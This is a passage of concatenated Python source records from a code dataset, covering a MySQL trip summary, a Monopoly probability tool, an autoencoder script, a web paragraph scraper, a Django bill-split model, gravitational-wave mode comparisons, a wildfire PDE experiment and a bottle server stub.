+ str(today.day) + \" 00:00:00\"\nelse:\n time1 = sys.argv[1][0:4] + \"-\" + sys.argv[1][4:6] + \"-00 00:00:00\"\n time2 = sys.argv[2][0:4] + \"-\" + sys.argv[2][4:6] + \"-31 23:59:59\"\n\n\n\nexe = \"SELECT imei, minute, sum(v) as v,count(v) as total, sum(v)/count(v) as percent FROM (SELECT imei,id,minute, (total_valid_reading > 0) as v FROM per_trip_each_minute_quality WHERE start_time BETWEEN '\"+ time1 + \"' AND '\"+ time2 + \"' group by imei,id,minute) as sub group by imei,minute\"\nconnection = pymysql.connect(host='hostname',\n user='user',\n passwd='passwd',\n db='db')\ncur = connection.cursor()\ncur.execute(exe)\nreadings = cur.fetchall()\nbikes_quality = {}\nfor bike in bikes:\n bikes_quality[str(int(bike))] = {}\n\nfor reading in readings:\n bikes_quality[reading[0]][reading[1]] = str(reading[4])\n\nbikes_array = []\nfor key, value in bikes_quality.items():\n arr = [];\n for minite in value:\n arr.append(value[minite]);\n bikes_array.append({\n \"IMEI\" : key,\n \"quality\":arr\n })\n\nprint(\"bikes_data = %s\" % (bikes_array))\n\nconnection.close()\n","sub_path":"scripts/perbikepertrip_summary/trip_summary.py","file_name":"trip_summary.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521414690","text":"#Work in progress, meant to be used with Spyder IPython console\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\ndef round4(x):\r\n return round(float(x)+0.00000000001,4)\r\n\r\ndef getLocation(location):\r\n options = {0 : 'go',\r\n 1: 'community chest',\r\n 2: 'baltic',\r\n 3: 'income tax',\r\n 4: 'reading railroad',\r\n 5: 'oriental',\r\n 6: 'chance',\r\n 7: 'vermont',\r\n 8: 'connecticut',\r\n 9: 'jail',\r\n 10: 'st charles',\r\n 11: 'electric company',\r\n 12: 'states',\r\n 13: 'virginia',\r\n 14: 'pennsylvania railroad',\r\n 15: 'st james',\r\n 16: 'community chest',\r\n 17: 'tennessee',\r\n 18: 'new york',\r\n 19: 'free parking',\r\n 20: 'kentucky',\r\n 21: 'chance',\r\n 22: 'indiana',\r\n 23: 'illonois',\r\n 24: 'b and o railroad',\r\n 25: 'atlantic',\r\n 26: 'venitor',\r\n 27: 'water works',\r\n 28: 'marvin gardens',\r\n 29: 'go to jail',\r\n 30: 'pacific',\r\n 31: 'north carolina',\r\n 32: 'community chest',\r\n 33: 'pennsylvania',\r\n 34: 'short line',\r\n 35: 'chance',\r\n 36: 'park place',\r\n 37: 'luxury tax',\r\n 38: 'boardwalk',\r\n }\r\n\r\n\r\n\r\ndef drawDistribution(X, P, title, CDF = False):\r\n bins = [n - .5 for n in X]\r\n bins.append(max(X) + .5)\r\n plt.figure(figsize = (10,5))\r\n if not CDF:\r\n (a,b,y) = plt.hist(X, bins, weights = P, normed = True)\r\n plt.title(title + \" (PMF)\")\r\n plt.xlabel(\"Outcomes\")\r\n\r\n elif CDF:\r\n (a,b,y) = plt.hist(X, bins, weights = P, cumulative = True)\r\n plt.xlabel(\"Cumulative Distribution\")\r\n plt.title(title + \" (CDF)\")\r\n plt.ylabel(\"Probability\")\r\n plt.show()\r\n \r\ndef seeDiceProbability():\r\n X = [a for a in range(2,13)]\r\n P = [0.0279, 0.0557, 0.0833, 0.111, 0.1383, 0.1667, 0.1391, 0.1109, 0.0835, 0.0557, 0.0278]\r\n \r\n drawDistribution(X,P, 'Probability of Dice Rolls')\r\n \r\ndef simulateDice(n):\r\n results = [0] * 11\r\n for x in range(n):\r\n result = random.randint(1,6) + random.randint(1,6)\r\n results[result - 2] += 1\r\n print('dice roll results: ' )\r\n print(results)\r\n prob = [0.0] * 11\r\n for x in range(len(results)):\r\n prob[x] = round4(results[x] / n)\r\n print('dice roll probabilities:')\r\n print(prob)\r\n X = [a for a in range(2,13)]\r\n P = prob\r\n drawDistribution(X, prob, 'Probability of Dice Rolls')\r\n \r\nclass Property:\r\n def __init__(self, title, color, price, status):\r\n #if status == False, property is unowned\r\n self.title = title\r\n self.color = color\r\n self.price = price\r\n self.status = False\r\n \r\n def __repr__(self):\r\n s = self.title + ': ' + str(self.color) + ' property. Costs ' + str(self.price) + ' dollars'\r\n return s\r\n\r\nclass Player:\r\n def __init__(self, name, location, money):\r\n self.name = name\r\n self.location = location\r\n self.money = money\r\n \r\n def __repr__(self):\r\n s = self.name + ' is at ' + getLocation(self.location) + ' and has ' + str(self.money) + ' dollars.'\r\n if (self.name == 'you'):\r\n s = self.name + ' are at ' + getLocation(self.location) + ' and have ' + str(self.money) + ' dollars.'\r\n return s\r\n\r\n \r\n \r\ndef locationStats(Player):\r\n \r\n print(Player.name + ' is currently at ' + getLocation(Player.location))\r\n print(Player.name + ' has a 17% chance of landing on ' + getLocation(Player.location + 6))\r\n print(Player.name + ' has a 14% chance of landing on ' + getLocation(Player.location + 5))\r\n print(Player.name + ' has a 14% chance of landing on ' + getLocation(Player.location + 7))\r\n print(Player.name + ' has an 11% chance of landing on ' + getLocation(Player.location + 8))\r\n \r\n \r\ndef main():\r\n name = input('Input player name: ')\r\n money = input('How much money does ' + name + ' have? ')\r\n location = 0\r\n player = Player(name, location, money)\r\n print()\r\n while(True):\r\n print(player)\r\n print()\r\n print('Enter 1 to see what spot you will most likely land on')\r\n print('Enter 2 to display the Probability Mass Function of each dice roll')\r\n print('Enter 3 when you are ready to roll')\r\n print('Enter 4 to simulate a dice roll')\r\n print('Enter q to quit')\r\n print()\r\n decision = input('What would you like to do? ')\r\n print()\r\n if decision == '1':\r\n print()\r\n locationStats(player)\r\n print()\r\n elif decision == '2':\r\n seeDiceProbability()\r\n elif decision == '3':\r\n result = input('What was the result? ')\r\n player.location += int(result) - 1\r\n\r\n \r\n elif decision == '4':\r\n roll = random.randint(1,6) + random.randint(1,6)\r\n if roll == 11 or roll == 8:\r\n print('You rolled an ' + str(roll))\r\n else:\r\n print('You rolled a '+ str(roll))\r\n print()\r\n elif decision == 'q':\r\n print('Quitting!')\r\n break\r\n else:\r\n print('Decision not recognized')\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"monopolyConsulting.py","file_name":"monopolyConsulting.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299891177","text":"#-------------------------------Resize-------------------------------\nimport os\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\n# from tensorflow import keras\nfrom tensorflow.keras import backend as k\n\nfrom tensorflow.keras.models import Sequential, load_model\n# from tensorflow.keras import backend\n\n\n#AttributeError: ‘_thread._local’ object has no attribute ‘value’の解決策以下\n# import keras.backend.tensorflow_backend as tb\n# tb._SYMBOLIC_SCOPE.value = True\n#-------------------------------学習modelのロード-------------------------------\n# model and backend graph must be created on global\n\n#AttributeError: ‘_thread._local’ object has no attribute ‘value’の解決策以下\nimport tensorflow as tf\n# sess = tf.compat.v1.Session(graph=tf.import_graph_def(), config=session_conf)\n# sess = tf.compat.v1.Session(graph=tf.compat.v1.get_default_graph(), config=session_conf)\n\n# tf.compat.v1.keras.backend.set_session(sess)\n\nglobal model, graph\nk.clear_session()\n\ndef autoencoder_model(encoder, decoder):\n model = Sequential()\n model.add(encoder)\n model.add(decoder)\n return model\n#学習済みモデルの読込モデルを実行したいだけであれば、compile=False\nencoder=load_model('py/AE_para/encoder_250.h5', compile=False)\ndecoder=load_model('py/AE_para/decoder_250.h5', compile=False)\nautoencoder = autoencoder_model(encoder, decoder)\nautoencoder.summary()\n# graph = tf.get_default_graph()\n\ninput_dir = 'py/output/'\npred_dir = 'py/pred/'\n\ndef gan_image(img_name):\n file_name = input_dir + img_name + '.JPG'\n img = Image.open(file_name).convert(\"RGB\"); img.close\n img = np.array(img)\n img = (img - 127.5) / 127.5\n img = img[np.newaxis, ...]\n pred = autoencoder.predict(img)\n pred = np.squeeze(pred)\n # with graph.as_default(): # use the global graph\n # pred = autoencoder.predict(img)\n img = Image.fromarray(np.uint8(pred * 127.5 + 127.5))\n file_name = pred_dir + img_name + '.JPG' \n img.save(file_name)\n print('finidh gan')","sub_path":"camerav5_realtime/py/gan.py","file_name":"gan.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619957891","text":"import re\nimport urllib\nfrom BeautifulSoup import *\n\n# open the \"ausurls.txt\" in the reading mode\nurlhand = open('aus_urls.txt', 'r')\ndata = urlhand.read()\nlst = data.rsplit(',,')\n\n# remove empty elements\nwhile lst.count(\"\") > 0:\n lst.remove(\"\")\n\n# extract unique elements in the list\nlst = list(set(lst))\n \n# open the \"aus_rawtext2.txt\" in the writing mode\nrawhand = open('aus_rawtext2.txt', 'w')\n\nfor url in lst:\n url = str(url.strip())\n html = urllib.urlopen(url).read()\n soup = BeautifulSoup(html)\n tags = soup.findAll('p')\n for line in tags:\n rawhand.write(str(line) + '. \\n')\n \nurlhand.close()\nrawhand.close()","sub_path":"aus_rawtext2.py","file_name":"aus_rawtext2.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518847339","text":"import decimal\n\nfrom django.db import models\nfrom django.utils import timezone\n\n\ndef convert_decimal_dollars_to_cents(dec):\n \"\"\"Convert a decimal dollar amount to total cents representation. Now handles negative values as well.\n\n '12.50' -> ['12', '25'] -> [12, 25] -> 12 * 100 + 25 => 1250\n '12.5' -> ['12', '5'] -> [12, 50] -> 12 * 100 + 50 => 1250\n '12.05' -> ['12', '05'] -> [12, 5] -> 12 * 100 + 5 => 1205\n '12' -> ['12'] -> [12] -> 12 * 100 + 0 => 1200\n\n :param dec: decimal.Decimal type ('123.23', '23', '0.45', etc.)\n :return: total cents (dollars * 100 + cents)\n \"\"\"\n dec_str = str(dec)\n dec_parts = dec_str.split('.')\n\n # Always at least length 1, so dollars always represented\n input_dollars = dec_parts[0]\n negative = 1 # Whether the value is negative or not (toggle by multiplying +1 or -1)\n\n if input_dollars: # Without decimal.Decimal, could get .25 -> '', '25'\n if input_dollars[0] == '-': # Handle negative amounts\n negative = -1 # Remember negative\n input_dollars = input_dollars[1:]\n dollar_cents = int(input_dollars) * 100\n else:\n dollar_cents = 0\n\n if len(dec_parts) > 1: # Dollars and Cents\n input_cents = dec_parts[1]\n if input_cents: # Without decimal, could get 5. -> '5', ''\n if len(input_cents) == 1:\n input_cents += '0' # Pad ending 0: 1.5 -> ['1', '5'] ==> 5 --> 50\n cent_cents = int(input_cents)\n else: # '' -> 0\n cent_cents = 0\n else: # Cents weren't entered\n cent_cents = 0\n total_cents = (dollar_cents + cent_cents) * negative # (toggle by multiplying +1 or -1)\n return total_cents\n\n\ndef format_cents_to_currency_text(all_cents):\n \"\"\"Format an entire amount represented by cents to a dollar.cents unicode string\n\n :param all_cents: Amount in cents (positive, negative, or 0)\n :return: Unicode\n \"\"\"\n if all_cents < 0: # Handle negative totals\n negative = True # Will Owe\n else:\n negative = False # Owed\n all_cents = abs(all_cents) # Division, Modulus done with positive number only\n dollars = all_cents / 100\n cents = all_cents % 100\n if negative: # Adjust for negative\n return u\"-{}.{:02d}\".format(dollars, cents)\n else:\n return u\"{}.{:02d}\".format(dollars, cents)\n\n\nclass MonthlyBill(models.Model):\n # Name of the Month Bill\n name = models.CharField(max_length=50, blank=False, default=u'New Bill')\n # Biller calculating the split\n biller = models.CharField(max_length=50, blank=False, default=u'Kendal')\n billee = models.CharField(max_length=50, blank=False, default=u'Shay')\n\n date_calculated = models.DateTimeField(auto_now_add=True, default=timezone.now)\n date_recalculated = models.DateTimeField(auto_now=True, default=timezone.now)\n\n # Parts of the Rent to be Paid By Each party\n biller_rent = models.DecimalField(max_digits=6, decimal_places=2, default=decimal.Decimal('455.00'),\n verbose_name=u'Biller Rent Half') # This is the amount the Biller is paying\n other_rent = models.DecimalField(max_digits=6, decimal_places=2, default=decimal.Decimal('580.00'),\n verbose_name=u'Other Rent Half') # This is the amount the Billee is paying\n\n # Halfable amounts\n electricity = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n water = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n cable = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n other = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n\n # Non halfable amounts\n additional = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n discount = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n\n biller_amount_due = models.CharField(max_length=20, default=\"0.00\")\n other_amount_due = models.CharField(max_length=20, default=\"0.00\")\n\n notes = models.TextField(blank=True)\n\n def save(self, *args, **kwargs):\n # Calculate and set biller and other due\n self._set_amounts_due()\n # Then save as normal\n super(MonthlyBill, self).save(*args, **kwargs)\n\n def _set_amounts_due(self):\n # Each party pays the half amount\n half_amount_cents = self._calculate_half_amount_cents()\n self._set_biller_due(half_amount_cents)\n self._set_other_due(half_amount_cents)\n\n def get_halfable_total(self):\n half_total_cents = self._calculate_half_amount_cents()\n return format_cents_to_currency_text(half_total_cents)\n\n def get_additional_amount(self):\n additional_cents = convert_decimal_dollars_to_cents(self.additional)\n return format_cents_to_currency_text(additional_cents)\n\n def get_discount_amount(self):\n discount_cents = convert_decimal_dollars_to_cents(self.discount)\n return format_cents_to_currency_text(discount_cents)\n\n def _set_other_due(self, half_amount_cents):\n additional_cents = convert_decimal_dollars_to_cents(self.additional)\n discount_cents = convert_decimal_dollars_to_cents(self.discount)\n # Rent + Half + Additional + Discount\n other_due_cents = self._other_rent_cents() + half_amount_cents + additional_cents - discount_cents\n self.other_amount_due = format_cents_to_currency_text(other_due_cents)\n\n def _set_biller_due(self, half_amount_cents):\n # Rent + Half\n biller_due_cents = self._biller_rent_cents() + half_amount_cents\n # Make sure cents always have a 0 in front for 2 decimal places\n self.biller_amount_due = format_cents_to_currency_text(biller_due_cents)\n\n def _biller_rent_cents(self):\n return convert_decimal_dollars_to_cents(self.biller_rent)\n\n def _other_rent_cents(self):\n return convert_decimal_dollars_to_cents(self.other_rent)\n\n def _calculate_half_amount_cents(self):\n \"\"\"Calculate the total half of the halfable amounts owed by each party.\n\n :return: The total half in cents\n \"\"\"\n # Get the cents amount for each halfable amount\n electric_cents = convert_decimal_dollars_to_cents(self.electricity)\n water_cents = convert_decimal_dollars_to_cents(self.water)\n cable_cents = convert_decimal_dollars_to_cents(self.cable)\n other_cents = convert_decimal_dollars_to_cents(self.other)\n # Add together all the cents amounts\n # Electricity + Water + Cable + Other\n total_cents = electric_cents + water_cents + cable_cents + other_cents\n # Half the total, done - each person owes this\n half_total_cents = total_cents // 2\n # penny_remainder = total_cents % 2 # Dropped\n return half_total_cents\n\n\n","sub_path":"MonthlySplit/biller/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"156969351","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport lalsimulation as lalsim\nimport lal\n\nimport sys\nsys.path.insert(0,'../mlgw_v2')\nimport GW_generator as gen\nfrom GW_helper import compute_optimal_mismatch\n\nsys.path.insert(0,'./IMRPhenomTPHM')\nfrom run_IMR import *\n\ndef twist_modes(g, h_22, h_21, alpha, beta, gamma):\n\tl = 2\n\talpha, beta, gamma = alpha[None,:], beta[None,:], gamma[None,:]\n\th_P = np.zeros((1,len(h_22),4))\n\n\tm_modes_list = [(2,2),(2,1)]#, (2,-1), (2,-2)] #len = M'\n\n\t\t#genereting the non-precessing l-modes available\n\th_NP_l = np.column_stack([h_22, h_21, np.conj(h_21), np.conj(h_22)])[None,:] #(N,D,M'')\n\tmprime_modes_list = [(2,2),(2,1), (2,-1), (2,-2)]\n\t\n\t#h_NP_l = np.column_stack([h_22, h_21, np.conj(h_22), np.conj(h_21)])[None,:] #(N,D,M'')\n\t#mprime_modes_list = [(2,2), (2,1), (2,-2), (2,-1)]\n\t\t\t\n\tD_mmprime = g._GW_generator__get_Wigner_D_matrix(l, [lm[1] for lm in m_modes_list], [lm[1] for lm in mprime_modes_list], alpha, beta, gamma) #(N,D,M, M'')\n\t\n\t\t#putting everything together\n\th_P_l = np.einsum('ijlk,ijk->ijl', D_mmprime, h_NP_l) #(N,D,M)\n\t\n\t\t#global roation for moving everything in L0 frame\n\t#D_mmprime_L0 = g._GW_generator__get_Wigner_D_matrix(l,[lm[1] for lm in m_modes_list], [lm[1] for lm in m_modes_list], -gamma[:,0], -beta[:,0], -alpha[:,0]) #(N,M,M)\n\t#h_P_l = np.einsum('ilk,ijk -> ijl', D_mmprime_L0, h_P_l)\n\t\n\t\t#saving the results in the output matrix\n\th_P = h_P_l\n\n\treturn h_P\n\n\n#FIXME: why TEOB has such better performance in mismatches for the HMs?? It has a shitty ring-down!\n\n#TODO: think on how to create a dataset of angles and how to train a model for the Euler angles\n#TODO: check if you can reproduce the WF using Euler Angles in L0 frame, rather than fitting applying global transformation at the end of everything\n\t #The change of frame is done here: https://git.ligo.org/lscsoft/lalsuite/-/blob/master/lalsimulation/lib/LALSimIMRPhenomTPHM.c#L380\n#TODO: Understand the impact of alpha0 and gamma0: they seem to matter for the mismatch!\n\n\t#to create a first attempt of dataset\n#create_angles_dataset(10,20.)\n\n\ng = gen.GW_generator(3)\n#theta = np.array([[40, 20, .4, -0.1, .2, .3, -0.5, -0.1]])\ntheta = np.array([[45, 30, 0.5, -0.4 , .2, -0.2, 0.5, -0.1]])\nf_min = 20.\nt_step = 1e-4\nt_grid, alpha, beta, gamma, h_22_NP, h_21_NP, h_22, h_21, h_2m1, h_2m2 = get_IMRPhenomTPHM_modes(*theta[0,:], f_min, t_step)\nprint(\"Theta: \",theta[0,:])\n\n\t#mlgw for twisted modes\nt_mlgw = t_grid - t_grid[np.argmax(np.abs(h_22_NP))]\nh_P_mlgw_real,h_P_mlgw_imag = g.get_twisted_modes(theta, t_mlgw, [(2,2),(2,1)], f_min, None, None, False)#,res['x'])\nh_P_mlgw = h_P_mlgw_real+1j*h_P_mlgw_imag\n\n\t#NP mlgw modes\nh_NP_mlgw_real,h_NP_mlgw_imag = g.get_modes(theta[:,[0,1,4,7]], t_mlgw, [(2,2),(2,1)], out_type='realimag')\nh_NP_mlgw = h_NP_mlgw_real+1j*h_NP_mlgw_imag\n\n\t#modes twisted by mlgw\nh_P_mlgw_T = twist_modes(g, h_22_NP, h_21_NP , alpha, beta, gamma) #here mlgw performs only the twist\n\nt_grid = t_grid - t_grid[np.argmax(h_22_NP)]\n\n\t#P choose TD modes (in L0 frame)\n\t#The change of frame is performed in XLALSimIMRPhenomTPHM_L0Modes (https://git.ligo.org/lscsoft/lalsuite/-/blob/master/lalsimulation/lib/LALSimIMRPhenomTPHM.c#L328)\nhlm = lalsim.SimInspiralChooseTDModes(0.,\n\t\t\t\tt_step,\n\t\t\t\ttheta[0,0]*lalsim.lal.MSUN_SI,\n\t\t\t\ttheta[0,1]*lalsim.lal.MSUN_SI,\n\t\t\t\ttheta[0,2],\n\t\t\t\ttheta[0,3],\n\t\t\t\ttheta[0,4],\n\t\t\t\ttheta[0,5],\n\t\t\t\t0.,\n\t\t\t\ttheta[0,7],\n\t\t\t\tf_min,\n\t\t\t\tf_min,\n\t\t\t\t1e6*lalsim.lal.PC_SI,\n\t\t\t\tlal.CreateDict(),\n\t\t\t\t5,\t\t\t#lmax\n\t\t\t\tlalsim.IMRPhenomTPHM\n\t\t\t)\nprefactor = 4.7864188273360336e-20\nm1, m2 = theta[0,0], theta[0,1]\nnu = np.divide(m1/m2, np.square(1+m1/m2))\namp_prefactor = prefactor*(m1+m2)/1.*nu\t\t\t\nh_22_P_lal = lalsim.SphHarmTimeSeriesGetMode(hlm, 2, 2).data.data/amp_prefactor\nh_21_P_lal = lalsim.SphHarmTimeSeriesGetMode(hlm, 2, 1).data.data/amp_prefactor\nt_grid_lal = np.linspace(0, len(h_22_P_lal)*t_step, len(h_22_P_lal))\nt_grid_lal = t_grid_lal- t_grid_lal[np.argmax(h_22_P_lal)]\n\nprint(\"Mismatch NP WFs: 22, 21\", compute_optimal_mismatch(h_NP_mlgw[0,:,0], h_22_NP)[0][0], compute_optimal_mismatch(h_NP_mlgw[0,:,1], h_21_NP)[0][0])\nprint(\"Mismatch P WFs: 22, 21\", compute_optimal_mismatch(h_P_mlgw[0,:,0], h_22)[0][0], compute_optimal_mismatch(h_P_mlgw[0,:,1], h_21)[0][0])\n\n\t#plotting\n#ignoring annoying real/imag warnings in plots\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\t\nplt.figure()\nplt.title(\"angles\")\nplt.plot(t_grid, alpha, label = 'alpha')\nplt.plot(t_grid, beta, label = 'beta')\nplt.plot(t_grid, gamma, label = 'gamma')\nplt.legend()\n\t\nfig, ax = plt.subplots(2,1)\nax[0].set_title(\"22 NP\")\nax[0].plot(t_grid, h_NP_mlgw[0,:,0], label = 'mlgw NP')\nax[0].plot(t_grid, h_22_NP, label = 'IMR NP')\n#ax[0].plot(t_grid, h_22, label = 'IMR P')\nax[1].set_title(\"21 NP\")\nax[1].plot(t_grid, h_NP_mlgw[0,:,1], label = 'mlgw NP')\nax[1].plot(t_grid, h_21_NP, label = 'IMR NP')\n#ax[1].plot(t_grid, h_21, label = 'IMR P')\nax[1].legend()\nfig.tight_layout()\n\nfig, ax = plt.subplots(2,1)\nax[0].set_title(\"22 P\")\nax[0].plot(t_grid, h_P_mlgw[0,:,0], label = 'mlgw full')\nax[0].plot(t_grid, h_P_mlgw_T[0,:,0], label = 'mlgw twist')\nax[0].plot(t_grid, h_22, label = 'IMR - J0')\n#ax[0].plot(t_grid_lal, h_22_P_lal, label = 'IMR - L0')\nax[1].set_title(\"21 P\")\nax[1].plot(t_grid, h_P_mlgw[0,:,1], label = 'mlgw full')\nax[1].plot(t_grid, h_P_mlgw_T[0,:,1], label = 'mlgw twist')\nax[1].plot(t_grid, h_21, label = 'IMR - J0')\n#ax[1].plot(t_grid_lal, h_21_P_lal, label = 'IMR - L0')\nax[1].legend()\nfig.tight_layout()\n\nif False:\n\tplt.figure()\n\tplt.title(\"ph diff\")\n\tplt.plot(t_grid, np.unwrap(np.angle(h_NP_mlgw[0,:,0])) - np.unwrap(np.angle(h_22_NP)), label = '22')\n\tplt.plot(t_grid, np.unwrap(np.angle(h_NP_mlgw[0,:,1])) - np.unwrap(np.angle(h_21_NP)), label = '21')\n\tplt.legend()\n\n\n\n\nplt.show()\n","sub_path":"precession/twist_IMR.py","file_name":"twist_IMR.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"2977453","text":"\"\"\"Convert nci paths to gene pathway\"\"\"\nimport argparse\n\ndef main(args):\n with open(args.nciPathFile) as f, open(args.outFile, 'w') as fout:\n print('gene\\tpathway', file=fout)\n for line in f:\n pathName, pathId, geneLs = line.strip().split('\\t')\n for gene in geneLs.split(','):\n print(gene + '\\t' + pathName, file=fout)\n\nif __name__ == \"__main__\":\n desc = 'Mk table of gene pathway'\n parser = argparse.ArgumentParser(description=desc)\n argLs = ('nciPathFile',\n 'outFile')\n for param in argLs:\n parser.add_argument(param)\n args = parser.parse_args()\n main(args)\n","sub_path":"code/scripts/mkNciPathTabData.py","file_name":"mkNciPathTabData.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522370814","text":"# Kernel preparation\n\n# Warning suppression\nimport warnings\nwarnings.simplefilter('ignore')\nimport numpy as np\nnp.warnings.filterwarnings('ignore')\nnp.random.seed(1001)\n# Cliche\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport IPython\nimport pandas as pd\n# import seaborn as sns\n\ndef play_audio(data):\n IPython.display.display(IPython.display.Audio(data=data))\n\n# =========================================================================================\n\n# Dataset preparation\n\n# Root folder that contains entire dataset\nDATAROOT = '/data/voice_zaloai/data'\ndf_train = pd.read_csv(DATAROOT + '/full_train_accent.csv')\ndf_test = pd.read_csv(DATAROOT + '/test.csv')\n\n# =========================================================================================\n\ndef pred_geometric_mean(preds_set):\n predictions = np.ones_like(preds_set[0])\n for preds in preds_set:\n predictions = predictions*preds\n predictions = predictions**(1./len(preds_set))\n return predictions\n\ndef pred_geometric_mean_by_files(npy_pred_files):\n preds_set = np.array([np.load(file) for file in npy_pred_files])\n predictions = pred_geometric_mean(preds_set)\n return predictions\n\n# =========================================================================================\n\nmodel_types = [\"alexnet\", \"seresnet\", \"vgg16\"]\nresolution_types = [\"LH\", \"X\"]\n\ndef get_all_prediction_files(root_path):\n for m in model_types:\n for r in resolution_types:\n for i in range(5):\n path = root_path + \"/%s/%s/test_predictions_%d.npy\" % (m, r, i)\n if os.path.exists(path):\n yield path\n\ndef get_result(pred_files):\n ensembled_test_preds = pred_geometric_mean_by_files(pred_files)\n result = np.array([np.argmax(x) for x in ensembled_test_preds])\n return result\n\n# =========================================================================================\n\ngender_test_pred_files = list(get_all_prediction_files(\"./gender_result\"))\naccent_test_pred_files = list(get_all_prediction_files(\"./accent_result\"))\n\ngender_result = get_result(gender_test_pred_files)\naccent_result = get_result(accent_test_pred_files)\n\ndf_test['gender'] = gender_result\ndf_test['accent'] = accent_result\n\ndf_test.columns = ['id', 'gender', 'accent']\n\ndf_test.to_csv(\"prediction_result.csv\", index=False)\n\n# =========================================================================================\n# =========================================================================================\n# =========================================================================================","sub_path":"src/XLH/ensemble/ensemble_result.py","file_name":"ensemble_result.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275495921","text":"import wildfire\nimport numpy as np\nimport plots as p\n\n\"\"\"\nTrying to copy Asensio 2002 experiment\nusing complete PDE system, K(u) != k\n\"\"\"\nM, N = 161, 161 #128, 128\nL = 1500 # Timesteps\ndt = 1e-2 # dt\nxa, xb = 0, 300 # x domain limit\nya, yb = 0, 300 # y domain limit\nx = np.linspace(xa, xb, N) # x domain\ny = np.linspace(ya, yb, M) # y domain\nt = np.linspace(0, dt*L, L) # t domain\n\n# Dimensional parameters\nT_inf = 300 # kelvin\nt_0 = 8987 # seconds\nl_0 = 0.3 # meters\n\n# Temperature initial condition\nu0 = lambda x, y: 4.8e0*np.exp(-5e-3*((x-75)**2 + (y-75)**2)) \n\n# Fuel initial condition\nb0 = lambda x, y: np.round(np.random.uniform(size=(x.shape)), decimals=2)#x*0 + 1 #S(x+.25, y+.25) #x*0 + 1\n\n# Wind effect\ngamma = 1e-2#e-3\nw1 = lambda x, y, t: gamma * 300 + x*0 \nw2 = lambda x, y, t: gamma * 300 + y*0 \nW = (w1, w2)\n\n# Vector\nv1 = lambda x, y, t: w1(x, y, t)\nv2 = lambda x, y, t: w2(x, y, t)\nV = (v1, v2)\n\n# Parameters\nkappa = 1e-1 # diffusion coefficient\nepsilon = 3e-1 # inverse of activation energy\nupc = 1 # 1 # u phase change # Smaller upc -> bigger fire front\nq = 1 # reaction heat\nalpha = 1e-3 # natural convection\n\n# Meshes for initial condition plots\n#X, Y = np.meshgrid(x, y)\n\n# Plot initial conditions\n#p.plotIC(X, Y, u0, b0, V, W, T=None, top=None)\n\n# Parameters for the model\nparameters = {\n 'u0': u0, \n 'beta0': b0,\n 'v': V,\n 'kappa': kappa, \n 'epsilon': epsilon, \n 'upc': upc, \n 'q': q, \n 'alpha': alpha, \n 'x': x, \n 'y': y,\n 't': t,\n 'sparse': True,\n 'show': False,\n 'complete': True\n}\n\nct = wildfire.fire(parameters)\n\n\n# Finite difference in space\nU, B = ct.solvePDE('fd', 'rk4')\n\n#ct.plots(U, B)\n\n# PLOT JCC\nX, Y = np.meshgrid(x, y)\np.plotJCC(t, X, Y, U, B, W, T=None, save=False)\n","sub_path":"experiments/asensio_test.py","file_name":"asensio_test.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235590260","text":"# -*- coding: utf-8 -*-\nCOPYRIGHT = \"Copyright(c)2014 koo@kormail.net All rights reserved\"\n\nfrom gevent import monkey\nmonkey.patch_all()\nimport bottle\nimport handlers\nimport logging.config\nfrom beaker.middleware import SessionMiddleware\ntry:\n import ConfigParser as configparser\nexcept ImportError:\n import configparser\n\nfrom user import UserManager\nfrom friend import FriendManager\nfrom post import PostManager\nfrom version import get_version\nimport utilities\n\n\nclass ServerApp(SessionMiddleware):\n\n def __init__(self, name):\n self.name = name\n self.parse_config(\"server.ini\")\n\n self.usermgr = UserManager(name)\n self.friendmgr = FriendManager(name, self.usermgr)\n self.postmgr = PostManager(name, self.friendmgr, self.publichost)\n\n self.userdb = self.usermgr.get_conn\n self.frienddb = self.friendmgr.get_conn\n self.postdb = self.postmgr.get_conn\n\n self.util = utilities\n super(type(self), self).__init__(bottle.app(), self.session_opts)\n\n def parse_config(self, config_file_name):\n logging.config.fileConfig(config_file_name)\n config = configparser.RawConfigParser()\n config.read(config_file_name)\n\n for option, value in config.items(self.name):\n try:\n _val = eval(value)\n except:\n _val = value\n setattr(self, option, _val)\n\n self.fileserver = config.get(\"tinyfile\", \"publichost\")\n\n session_opts = {}\n for option, value in config.items(\"session\"):\n key = \"session.\" + option\n session_opts[key] = value\n self.session_opts = session_opts\n\n host, port = 